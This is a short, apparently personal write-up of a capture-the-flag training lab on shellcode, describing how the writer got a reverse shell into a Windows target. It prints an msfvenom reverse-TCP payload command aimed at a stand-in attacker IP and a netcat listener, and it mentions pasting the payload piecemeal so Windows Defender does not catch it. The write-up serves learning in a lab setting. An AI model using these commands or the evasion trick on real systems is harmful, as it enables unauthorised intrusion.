Topic Covered Day 8: Shellcode

She sells sea shells at the shellcode cove!

Todays topic was shellcodes; a piece of code that is injected into vulnerable systems in order to trigger the execution of arbitary commands. With the shellcodes our tasks where to get a reverse shell to a windows machine with PowerShell.

To generate the shellcode we are instructed to use msfvernom first at port 1111 and then at the attack port 4444 and make it connect to our machine with the ip of the AttackBox.

msfvernom -p windows/x64/shell_reverse_tcp LHOST=ATTACK_BOX_IP LPORT=4444 -f powershell

That line would generate a hex encoded byte array that we would paste into our given powerShell code that would deliver the payload. Fun fact! If you put the code in a .ps1 file (powershell script) Windows Defender would infact pick it up and stop you from running it! So get ready for Ctrl+C and Ctrl+V price by piece since you gotta make it in steps.

If you have an issue with the clipboard not pasting right is would recommend at home directory to run

python3 -m http.server

so you will be able to see and download the files from the attack box to the target machine. Important step was to start netcat at the attack box by running the below command so you could initiate the reverse shell!

netcat -nvlp 4444

Where you to run all the scripts without having the powershell crash, you would be getting a successfull reverse shell and on the terminal running netcat, you would see that you now have a powershell into the target machine. To get the flag all you have to do is navigate to the Desktop and run type on the flag thus getting the flag and completing Day 8.

cd Desktop
type flag.txt

This was fun, learned something new and got my 7 day Streak sticker! Can't wait for Day 9!